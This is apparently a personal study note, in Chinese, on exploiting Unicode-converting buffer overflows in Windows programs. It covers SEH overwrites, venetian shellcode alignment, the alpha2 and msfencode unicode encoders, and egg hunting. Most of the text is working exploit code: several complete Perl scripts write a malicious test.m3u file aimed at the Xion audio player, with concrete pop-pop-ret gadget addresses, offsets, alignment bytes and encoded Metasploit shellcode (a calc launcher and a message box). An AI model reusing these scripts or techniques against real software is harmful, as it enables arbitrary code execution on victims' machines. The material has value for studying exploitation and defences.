UNICODE 会自动插入NULL字符
1)覆盖ret控制
寻找 形似 0x00nn00mm 的 jmp xxx 的地址 可以jmo 到shellcode执行
2)基于SEH 控制EIP+SHORT JMP
寻找 pop pop ret 不包含>7f 的入口地址 用来覆盖SEH header
先将 nseh 置为 xccxcc 再来寻找 两字节的 short jmp
3)基于SEH jmp
不用 short jmp 使用一些无害代码来覆盖NSEH 以使其能够执行到被覆写的SEH 结构之后,
然后再被执行代码放置于诶覆盖的SEH结构之后,这样跳过nseh + seh之后就执行我们的代码
需要如下
(1) 无害指令 放置在 nseh(2)“unicode compatible” 地址用来覆盖 seh hander ,并且执行它不会造成任何伤害
当 ASCii 码 >7f 时,unicode 转换后都会变为完全不同的值,eg:0x80 -> 1a20 -》 可以构造成0x00nn1a20
ascii shellcode _> unicode shellcode:
1) 查找等效 ASCII并跳转到该:
ascii 被载入内存后,都会变为 unicode,因此在其中找到ascii版本的shellcode,如果能控制EIP 使其跳转到指定地址
那么就有可能实现exploit。 如果无法到达,那么控制某一寄存器的内容,跳转到那个寄存器,放置一些跳转指令,使其跳转到ASCII版本的shellcode
2)编写自己的unicode-compatible shellcode
3)使用编码器
将ASCII-》unicode 并在其前端放上解码器,经解码后 就可以生产原始 代码并执行了
(1)通过特定的内存地址上重构原始代码,然后跳转到那个地址
其中某个寄存器必须指向 decoder+shellcode 的入口地址,另一个寄存器必须指向可写的内存地址(shellcode)
(2)通过改变代码执行流程,使其运行到重构的shellcode上
使用一个指向 decoder+shellcode的入口地址的寄存器即可,同时让原始shellcode经重构后保存在该处
工具学习:
1)makeunicode2.py 不会····
2)vense.pl 下载地址: http://www.phenoelit-us.org/win
生成一字节 字符串,包含decoder+原始shellcode,,为了使用docoder,还需要设置 寄存器
1个寄存器直接指向 buffer 入口地址 用于存放vense.pl 生成的shellcode 2 个寄存器需要指向一段可写可执行 的内存地址,能够向内写入数据
shellcode 入口地址 = eax 可写地址 = edi
改写 $secondstage 为 metasploit 生成的perl shellcode 并解码后可以正常执行
运行脚本 1)显示原始 shellcode 2)新生成的shellcode 包含decoder
将新生成shellcode放入 exploit 确保 eax->shellcode 入口地址 !!!这里需要重新调整寄存器,并视同unicode-compatible代码实现跳转 ,方法点击这里,
寄存器设置好了之后,运行 jmp eax ,解码器就是提取出原始的shellcode 并执行它
注意:
(1)不能再不是UNIICODE EXP 上运用 (2)虽然脚本中使用算法是经makeunicode2改善后的版本,但依然会生成很长的shellcode,所以要求的缓冲区很大
3)alpha2 下载地址: http://download.csdn.net/detail/hksoobe/4803452
同时也包含在 MSF中,将会把shellcode包裹在 decoder 之中
(1)只需要指定 shellcode入口的寄存器,唔需要指向可写可执行地址的寄存器
(2)decoder 并不包含在原来代码中,decoder可自我修改,而且要求的缓冲区空间也比较小
MSF中的没下载不用··························
root@bt:~/Desktop# ./alpha2 eax --unicode --uppercase < 1.bin
root@bt:~/Desktop# ./alpha2 --help Usage: ./alpha2 [OPTION] [BASEADDRESS] ALPHA 2 encodes your IA-32 shellcode to contain only alphanumeric characters. The result can optionaly be uppercase-only and/or unicode proof. It is a encoded version of your origional shellcode. It consists of baseaddress-code with some padding, a decoder routine and the encoded origional shellcode. This will work for any target OS. The resulting shellcode needs to have RWE-access to modify it's own code and decode the origional shellcode in memory. BASEADDRESS The decoder routine needs have it's baseaddress in specified register(s). The baseaddress-code copies the baseaddress from the given register or stack location into the apropriate registers. eax, ecx, edx, ecx, esp, ebp, esi, edi Take the baseaddress from the given register. (Unicode baseaddress code using esp will overwrite the byte of memory pointed to by ebp!) [esp], [esp-X], [esp+X] Take the baseaddress from the stack. seh The windows "Structured Exception Handler" (seh) can be used to calculate the baseaddress automatically on win32 systems. This option is not available for unicode-proof shellcodes and the uppercase version isn't 100% reliable. nops No baseaddress-code, just padding. If you need to get the baseaddress from a source not on the list use this option (combined with --nocompress) and replace the nops with your own code. The ascii decoder needs the baseaddress in registers ecx and edx, the unicode-proof decoder only in ecx. -n Do not output a trailing newline after the shellcode. --nocompress The baseaddress-code uses "dec"-instructions to lower the required padding length. The unicode-proof code will overwrite some bytes in front of the shellcode as a result. Use this option if you do not want the "dec"-s. --unicode Make shellcode unicode-proof. This means it will only work when it gets converted to unicode (inserting a '0' after each byte) before it gets executed. --uppercase Make shellcode 100% uppercase characters, uses a few more bytes then mixedcase shellcodes. --sources Output a list of BASEADDRESS options for the given combination of --uppercase and --unicode. --help Display this help and exit --version Output version information and exit See the source-files for further details and copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Acknowledgements: Thanks to rix for his phrack article on aphanumeric shellcode. Thanks to obscou for his phrack article on unicode-proof shellcode. Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code. Report bugs to <skylined@edup.tudelft.nl>
4) metasploit
root@bt:/opt/framework/msf3# ./msfpayload windows/exec CMD=calc R | > ./msfencode -e x86/alpha_mixed -t raw | > ./msfencode -e x86/unicode_upper BufferRegister=EAX -t perl [*] x86/alpha_mixed succeeded with size 454 (iteration=1) [*] x86/unicode_upper succeeded with size 1039 (iteration=1) my $buf = "x50x50x59x41x49x41x49x41x49x41x49x41x51x41" . "x54x41x58x41x5ax41x50x55x33x51x41x44x41x5a" . "x41x42x41x52x41x4cx41x59x41x49x41x51x41x49" . "x41x51x41x50x41x35x41x41x41x50x41x5ax31x41" . 省略····
1)只能有一套限定的指令集
2)避免NULL 字符,要求添加NULL后的shellcode仍然可正常运行
3)机器码对齐问题
venetian shellcode 技术
确保NULL和指令以正确的放上对齐
单字节转换为UNICODE编码时不被 破坏寄存器或者指令 还不行的话 查看 http://phrack.org/issues/61/11.html#article
00 6e 00:add byte ptr [esi],ch 00 6f 00:add byte ptr [edi],ch 00 70 00:add byte ptr [eax],ch 00 71 00:add byte ptr [ecx],ch 00 72 00:add byte ptr [edx],ch 00 73 00:add byte ptr [ebx],ch 00 62 00:add byte ptr [edx],ah 00 6d 00:add byte ptr [ebp],ch
1)假设ESI 指向可写地址
假设 ASCII 版本的shellcode 在 0x33445566,eax 写入它 perl 脚本:
my $align = "xb8x44xaa"; #mov eax,0x0AA004400
$align=$align."x6e"; #nop/align nullbytes
$align=$align."x50"; #push eax
$align=$align."x6e"; #nop/align nullbytes
$align=$align."x4c"; #dec esp
$align=$align."x6e"; #nop/align nullbytes
$align=$align."x58"; #pop eax ,eax=0x004400??
$align=$align."x6e"; #nop/align nullbytes
$align=$align."x05x55x33"; #add eax,33005500h ,eax=0x334455??
$align=$align."x6e"; #nop/align nullbytes
$align=$align."xb0"; #mov al,0
#no alignment needed between these 2!
$align=$align."xb9x66xaa"; #mov ecx,AA006600h ,eax =0x33445500
$align=$align."xe8"; #add al,ch ,eax =0x33445566
#接下来就是 jmp eax
$align=$align."xe8"; #add al,ch ,eax =0x33445566
$align=$align."x6e"; #nop/align nullbytes
!!!注意 这里 有一个错误 0xc3 转换为unicode时不慎0xc3了
所以一般直接走到shellcode
但是 http://bbs.pediy.com/showthread.php?t=126344
说的有可能构造出 c3
'x72xcbx72' #ret 转换成'x72x00xc3x85x41x00'
2) 假设 ebp+0x100 放入eax 之后调到EAX 去执行代码,那么就先写入一些汇编指令
00401580 > 55 push ebp 00401581 58 pop eax 00401582 05 00140011 add eax,0x11001400 00401587 2D 00130011 sub eax,0x11001300 EBP+0x100
利用 venetian shellcode 技术构造 以上代码
x6e #nop/align nullbytes
x55 #push ebp
x6e #nop/align nullbytes
x58 #pop eax
x6e #nop/align nullbytes
x05x14x11 #add eax,0x11001400
x6e #nop/align nullbytes
x2dx13x11 #sub eax,0x11001300
x6e #nop/align nullbytes
这里准备一个例子 : xion 1.0 build120:
用OD调试出来是 0x235
然后
!pvefindaddr p2
#Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:Program Files
2 StudiosXionXion.exe
#Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:Program Files
2 StudiosXionXion.exe
#Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:Program Files
2 StudiosXionXion.exe
不能要 >7f 的字节
这里选择 0x00470034
下来这个是WINDBG找出来的,还不算成功呢 调试才能成功运行shellcode
my $file = "test.m3u"; #my $junk = "A"x270; my $nseh = "x61x62";#61 is popad 62为align bytes my $seh = "x34x47";#"x34x47";pop pop ret #Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:Program Files 2 StudiosXionXion.exe #Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:Program Files 2 StudiosXionXion.exe #Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:Program Files 2 StudiosXionXion.exe my $VenetianShellcode ="x6e"; $VenetianShellcode =$VenetianShellcode."x55";#55 push ebp $VenetianShellcode =$VenetianShellcode."x6e"; $VenetianShellcode =$VenetianShellcode."x58";#58 pop eax $VenetianShellcode =$VenetianShellcode."x6e"; $VenetianShellcode =$VenetianShellcode."x05x14x11";#05 00140011 add eax,0x11001400 $VenetianShellcode =$VenetianShellcode."x6e"; $VenetianShellcode =$VenetianShellcode."x2dx13x11";#2D 00130011 sub eax,0x11001300 EBP+0x100 $VenetianShellcode =$VenetianShellcode."x6e"; #229fe54 - 229fd76 = DE = 222 just need 111 不能用push eax ret c3不能正确转换为c3 #1)"x43x6e" inc ebx ,add byte ptr [esi],ch my $junk2 = "x70"x111; #2)"x70" jo xxx 1,2都可以用来作为nop来对齐地址为eax ,指向shellcode第一字节 #缓冲区为 1840bits 从这里开始 而shellcode为 1037bits *2 = 2074 所以shellcode分为两段 my $buf = "x50x50x59x41x49x41x49x41x49x41x49x41x51x41" . "x54x41x58x41x5ax41x50x55x33x51x41x44x41x5a" . "x41x42x41x52x41x4cx41x59x41x49x41x51x41x49" . "x41x51x41x50x41x35x41x41x41x50x41x5ax31x41" . "x49x31x41x49x41x49x41x4ax31x31x41x49x41x49" . "x41x58x41x35x38x41x41x50x41x5ax41x42x41x42" . "x51x49x31x41x49x51x49x41x49x51x49x31x31x31" . "x31x41x49x41x4ax51x49x31x41x59x41x5ax42x41" . "x42x41x42x41x42x41x42x33x30x41x50x42x39x34" . "x34x4ax42x43x59x5ax42x49x49x58x4bx5ax39x52" . "x52x4bx44x52x39x51x39x51x39x51x39x51x39x51" . "x39x51x39x50x49x51x39x51x39x51x39x50x49x51" . "x33x50x43x50x43x51x33x51x33x51x33x50x37x50" . "x51x50x5ax52x4ax51x31x50x58x52x30x50x30x51" . "x31x50x30x51x31x52x4bx51x31x51x31x52x31x50" . "x32x51x31x51x32x50x32x50x42x51x32x50x30x51" . "x32x51x32x51x31x50x42x52x38x50x50x50x38x51" . "x31x51x32x43x45x50x4ax50x49x50x49x52x4cx50" . "x58x43x38x50x4bx50x39x51x37x54x30x50x43x50" . "x30x50x45x52x30x52x31x54x30x50x4cx51x39x50" . "x4dx50x35x52x30x50x31x52x38x51x42x51x33x52" . "x34x50x4ex52x4bx50x50x52x32x50x56x50x50x50" . "x4cx50x4bx52x32x52x52x52x34x50x4cx50x4ex52" . "x4bx52x30x51x42x50x56x43x44x50x4cx50x4bx50" . "x50x43x42x50x51x50x38x51x46x52x4fx50x4dx52" . "x47x50x43x43x4ax52x36x50x46x50x56x52x31x50" . "x49x52x4fx50x56x50x51x50x4bx52x50x50x4cx52" . "x4cx51x35x52x4cx50x51x52x51x50x51x52x4cx52" . "x34x51x32x51x46x50x4cx50x45x52x50x50x4bx52" . "x51x52x38x50x4fx50x56x52x4dx51x33x50x31x51" . "x48x51x37x50x4dx50x32x50x5ax52x30x52x36x50" . "x32x50x52x54x37x50x4ex52x4bx52x31x51x32x50" . "x56x52x50x50x4cx50x4bx50x52x43x32x51x35x52" . "x4cx51x35x52x31x50x58x50x50x50x4cx50x4bx50" . "x43x52x50x52x31x51x58x50x4fx52x55x50x4bx54" . "x30x52x31x43x34x51x33x52x5ax51x46x51x51x50" . "x5ax52x50x51x46x50x30x50x4cx50x4bx50x43x54" . "x38x50x56x43x48x50x4ex52x4bx50x50x50x58x50" . "x51x50x30x51x37x54x31x50x4bx51x53x51x39x52" . "x53x50x47x50x4cx50x52x43x39x50x4cx50x4bx51" . "x35x43x34x50x4cx50x4bx50x47x54x31x50x5ax54" . "x36x50x45x43x31x51x39x52x4fx50x50x50x31x50" . "x4bx52x50x50x4cx52x4cx50x5ax43x31x52x38x50" . "x4fx51x44x50x4dx51x33x50x31x52x38x50x47x50" . "x47x51x38x50x4bx50x50x52x30x43x45x50x5ax50" . "x54x50x56x43x33x50x43x50x4dx50x58x54x38x50" . "x47x50x4bx52x31x52x4dx51x35x43x44x52x34x50" . "x35x50x5ax50x42x51x46x50x38x50x4ex52x4bx52" . "x36x50x38x51x46x51x34x51x37x54x31x51x4ax54" . "x33x50x50x52x46x50x4cx50x4bx50x54x50x4cx52" . "x30x50x4bx50x4ex52x4bx50x56x50x38x51x35x50" . "x4cx50x47x52x51x51x48x50x53x50x4ex52x4bx50" . "x47x54x34x50x4cx50x4bx51x46x51x51x52x38x52" . "x30x50x4fx54x39x52x30x51x34x50x47x52x34x50" . "x54x43x34x50x43x52x4bx52x31x50x4bx50x51x54" . "x31x52x30x50x59x50x50x50x5ax51x33x43x31x51" . "x39x52x4fx50x4bx52x30x50x50x52x38x51x33x52" . "x4fx51x42x52x5ax50x4ex52x4bx50x45x50x42x51" . "x48x52x4bx50x4ex52x46x52x31x50x4dx52x30x51" . "x5ax51x33x50x31x50x4cx50x4dx50x4ex52x45x50" . "x4ex50x59x50x47x52x50x50x45x52x30x50x45x50" . "x50x50x56x50x30x50x45x50x38x52x34x54x31x50" . "x4ex52x4bx52x32x50x4fx50x4cx50x47x50x4bx50" . "x4fx50x58x50x55x50x4dx52x4bx51x48x52x50x50" . "x4ex50x55x50x4ex50x42x51x42x43x46x51x33x51" . "x48x51x39x50x36x50x4dx50x45x50x4dx52x4dx50" . "x4fx52x4dx50x4bx50"; #junk my $junk = "x4fx50x4bx51x55x50x45x52" . "x4cx51x33x50x36x50x51x52x4cx52x36x51x5ax50" . "x4fx54x30x50x4bx50x4bx50x4bx52x30x52x32x52" . "x35x51x37x52x55x50x4fx50x4bx52x31x50x57x52" . "x32x50x33x50x50x43x42x50x50x52x4fx51x42x50" . "x4ax51x35x52x30x50x56x50x33x51x39x52x4fx51" . "x39x51x35x50x45x50x33x50x51x54x31x52x30x52" . "x4cx50x43x50x53x51x35x52x30x51x31x51x31x41" . "x41"; $junk = $junk."A"x(270-length($junk)); my $junk3 = "x42"x(5000-length($junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf)); my $payload = $junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf.$junk3; open($FILE,">$file"); print $FILE $payload; close($FILE);
运用自己的shellcode 加密成为 unicode 能用的shellcode
root@bt:/opt/framework/msf3# cat exploit.m3u | ./msfencode -e x86/alpha_mixed -t raw | ./msfencode -e x86/unicode_upper BufferRegister=EAX -t perl [*] x86/alpha_mixed succeeded with size 277 (iteration=1) [*] x86/unicode_upper succeeded with size 685 (iteration=1) my $buf = "x50x50x59x41x49x41x49x41x49x41x49x41x51x41" .···省略
下面这个才是正确的 POC 问题在于: windbg和OD(正常) 的调试出来的POC不一样这是怎么一回事呢
而且windbg调试出来的POC 肯定是错误的! OD调试出来的才是正确的
1) 寻找 unicode 形式的 pop pop ret 覆盖 SEH handler !pvefindaddr p2 可以找到
2) nseh 用 popad 可以得到 寄存器+偏移 指向 我们输入的字符串某一位置
3) 构造 VenetianShllcode 使得 eax = 我们输入的字符串某一位置
4) 构造 nop/align 得到 eax= shellcode起始第一字节
5) 用生成的unicode shellcode , eax = shellcode起始 ,执行shellcode shellcode = 解码器+代码
my $file = "test.m3u";#perl #my $junk = "A"x270; my $nseh = "x61x62";#61 is popad 62为align bytes my $seh = "x34x47";#"x34x47";pop pop ret #Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:Program Files 2 StudiosXionXion.exe #Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:Program Files 2 StudiosXionXion.exe #Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:Program Files 2 StudiosXionXion.exe my $VenetianShellcode ="x6e"; $VenetianShellcode =$VenetianShellcode."x55";#55 push ebp $VenetianShellcode =$VenetianShellcode."x6e"; $VenetianShellcode =$VenetianShellcode."x58";#58 pop eax $VenetianShellcode =$VenetianShellcode."x6e"; $VenetianShellcode =$VenetianShellcode."x05x14x11";#05 00140011 add eax,0x11001400 $VenetianShellcode =$VenetianShellcode."x6e"; $VenetianShellcode =$VenetianShellcode."x2dx13x11";#2D 00130011 sub eax,0x11001300 EBP+0x100 $VenetianShellcode =$VenetianShellcode."x6e"; #229fe54 - 229fd76 = DE = 222 just need 111 不能用push eax ret c3不能正确转换为c3 my $junk2 = "x48x6e"x42; #1)"x43x6e" inc ebx ,add byte ptr [esi],ch $junk2 = $junk2."x70"x6; #2)"x70" jo xxx 1,2都可以用来作为nop来对齐地址为eax ,指向shellcode第一字节 #缓冲区为 1840bits 从这里开始 而shellcode为 1037bits *2 = 2074 所以shellcode分为两段 my $buf = "x50x50x59x41x49x41x49x41x49x41x49x41x51x41" . "x54x41x58x41x5ax41x50x55x33x51x41x44x41x5a" . "x41x42x41x52x41x4cx41x59x41x49x41x51x41x49" . "x41x51x41x50x41x35x41x41x41x50x41x5ax31x41" . "x49x31x41x49x41x49x41x4ax31x31x41x49x41x49" . "x41x58x41x35x38x41x41x50x41x5ax41x42x41x42" . "x51x49x31x41x49x51x49x41x49x51x49x31x31x31" . "x31x41x49x41x4ax51x49x31x41x59x41x5ax42x41" . "x42x41x42x41x42x41x42x33x30x41x50x42x39x34" . "x34x4ax42x45x39x5ax46x58x59x58x4ex58x59x54" . "x36x4bx44x50x59x51x39x50x49x50x49x51x39x51" . "x39x51x39x50x49x50x49x50x49x51x39x51x39x51" . "x33x51x33x50x43x51x33x50x43x51x33x50x37x50" . "x51x51x4ax52x4ax51x31x52x38x52x30x50x30x51" . "x31x50x30x51x31x52x4bx51x31x51x31x50x51x50" . "x32x51x31x51x32x50x32x51x32x51x32x50x30x51" . "x32x51x32x51x31x50x42x51x48x52x30x50x38x51" . "x31x50x42x43x45x50x4ax51x39x52x30x50x31x50" . "x5ax52x52x51x48x50x32x50x54x54x30x52x32x51" . "x34x50x4ex52x4bx51x44x52x32x50x4cx50x4bx50" . "x51x51x32x52x36x52x4cx50x4cx50x4bx51x33x51" . "x52x51x37x52x4cx50x4ex52x4bx50x51x50x52x50" . "x47x43x48x50x4ex52x4bx52x34x50x32x50x47x50" . "x50x50x4cx50x4bx52x36x54x32x50x4fx52x50x50" . "x51x52x4ex50x56x52x4cx51x35x43x33x52x34x50" . "x35x51x39x52x42x50x4cx50x49x52x38x51x37x50" . "x43x50x33x50x51x51x58x50x47x50x4cx50x4cx50" . "x4bx52x30x50x57x52x32x50x58x50x45x50x51x50" . "x4fx50x32x50x4ex52x4bx50x51x52x4ax51x37x50" . "x50x51x35x50x51x50x4bx43x47x52x34x52x51x52" . "x38x52x4dx50x4cx50x4bx51x35x52x44x50x4ex50" . "x4fx50x43x50x31x50x4bx54x36x50x52x52x45x50" . "x4fx54x31x51x37x50x4ex51x37x50x36x52x30x51" . "x51x52x31x52x44x51x35x50x31x52x34x50x35x50" . "x49x43x32x50x4bx50x31x52x31x52x4ex50x54x50" . "x48x51x37x50x35x52x30x43x48x52x30x43x39x51" . "x42x51x44x52x30x52x55x50x58x52x49x50x4ex52" . "x4bx50x43x50x4ax51x44x52x44x51x33x50x31x50" . "x4fx50x37x50x50x43x36x50x4ex52x4bx51x46x50" . "x4cx52x30x52x4fx50x4cx50x4bx51x33x50x4ax50" . "x47x52x4cx50x45x50x51x50x4fx50x37x50x4cx50" . "x4bx50x43x50x4cx50x4ex50x4fx51x39x52x4cx51" . "x46x43x31x51x48x50x47x50x52x51x38x50x43x51" . "x44x50x43x50x51x50x43x52x50x51x37x54x31x52" . "x30x43x38x50x47x50x30x50x54x50x30x51x35x50" . "x31x50x52x50x4ex50x4bx50x39x50x4dx50x31x50" . "x4bx50x4ex52x32x43x39x50x45x50x57x51x44x54" . "x31x50x4bx54x30x50x56x50x31x52x30x50x50x50" . "x4bx50x4fx50x5ax54x37x51x31x51x31x41x41"; #junk $junk = "A"x235; my $junk3 = "x42"x(5000-length($junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf)); my $payload = $junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf.$junk3; open($FILE,">$file"); print $FILE $payload; close($FILE);
下面构造 unicode 版本的 egg hunting egg hunting 可以解决 字符不够用的情况 ,将会覆盖 shellcode到其他地方 然后去找寻 执行
构造shellcode
root@xxx:/opt/framework/msf3# ./msfpayload windows/messagebox TEXT="#pand0#" TITLE="#pand0#" R > /root/Desktop/1.bin
···········································
root@bt:~/Desktop# ./alpha2 eax --unicode --uppercase < 1.bin
PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1A`````````````````````````
my $file = "test.m3u";#perl #my $junk = "A"x270; my $nseh = "x61x62";#61 is popad 62为align bytes my $seh = "x34x47";#"x34x47";pop pop ret #Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:Program Files 2 StudiosXionXion.exe #Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:Program Files 2 StudiosXionXion.exe #Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:Program Files 2 StudiosXionXion.exe my $VenetianShellcode ="x6e"; $VenetianShellcode =$VenetianShellcode."x55";#55 push ebp $VenetianShellcode =$VenetianShellcode."x6e"; $VenetianShellcode =$VenetianShellcode."x58";#58 pop eax $VenetianShellcode =$VenetianShellcode."x6e"; $VenetianShellcode =$VenetianShellcode."x05x14x11";#05 00140011 add eax,0x11001400 $VenetianShellcode =$VenetianShellcode."x6e"; $VenetianShellcode =$VenetianShellcode."x2dx13x11";#2D 00130011 sub eax,0x11001300 EBP+0x100 $VenetianShellcode =$VenetianShellcode."x6e"; #229fe54 - 229fd76 = DE = 222 just need 111 不能用push eax ret c3不能正确转换为c3 my $junk2 = "x48x6e"x42; #1)"x43x6e" inc ebx ,add byte ptr [esi],ch $junk2 = $junk2."x70"x6; #2)"x70" jo xxx 1,2都可以用来作为nop来对齐地址为eax ,指向shellcode第一字节 #缓冲区为 1840bits 从这里开始 而shellcode为 1037bits *2 = 2074 所以shellcode分为两段 my $egghunter = "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBQVU1XJKOLOQ2R2QZLB0X8MNNOLM5QJ44JO6XM0P0KPT44KKJ6O45IZFO3EJGKOIWA"; #egg 用 x00x30x00x74 $junk2 = $junk2.$egghunter; my $garbage = "X"x100; #########################################################垃圾代码############################################ my $aligin = "x6d". "x57". #push edi "x6d". "x58". #pop eax "x6d". "x05x14x11".#05 00140011 add eax,0x11001400 "x6d". "x2dx13x11".#2D 00130011 sub eax,0x11001300 eax+0x100 "x6d". "x40". #inc eax "x6d". "x70"x113;#注意相加减得到的差 要除2 my $buf =("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBYIZKUKXYRTMTJTNQZ27BSGNQ8I34TKD1NPDK46LLDKRVML4KQ6LHTK3NO04KNVOHPOMHBUL3PYKQXQKO9QQP4K2LMTO4TKPEOL4K1DMXBXM1ZJ4KOZN84KPZMPKQJKK3P4Q9DKNT4KKQZNNQKONQY0KLVLU47PBTKWWQXOLMM1WWJKJTOK3LNDMX459QDK1JMTM1JK36TKLL0KDKQJMLM1ZKTKLDTKKQJHTIOTO4MLQQ8C7BLHMYHTSYK5E9WRS8TN0NLNZL22IXUOKOKOKOU9OULDWKCNIHZB3CTGMLMT22YXDNKOKOKOU9PEKXBH2LBLO011RHP3P2NN1TQXRU2SC52R4H1LO4KZ3YJFPVKO25KTE98B20WKUX6B0MWL4GMLND229X1QKOKOKO1X1TP0MSQHQXMS2P1QBNNQIKCX1LO4KW4IYSQX1T00MS28QXNC2P1Q2NNQI9THPLNDKWCYYQNQZ21BPSR1PRKOXPNQWPB0KO0ULHA"); #panda0# $junk = "A"x235; my $junk3 = "x42"x(5000-length($junk.$nseh.$seh.$VenetianShellcode.$junk2.$garbage."0t0t".$aligin.$buf)); my $payload = $junk.$nseh.$seh.$VenetianShellcode.$junk2.$garbage."0t0t".$aligin.$buf.$junk3; open($FILE,">$file"); print $FILE $payload; close($FILE);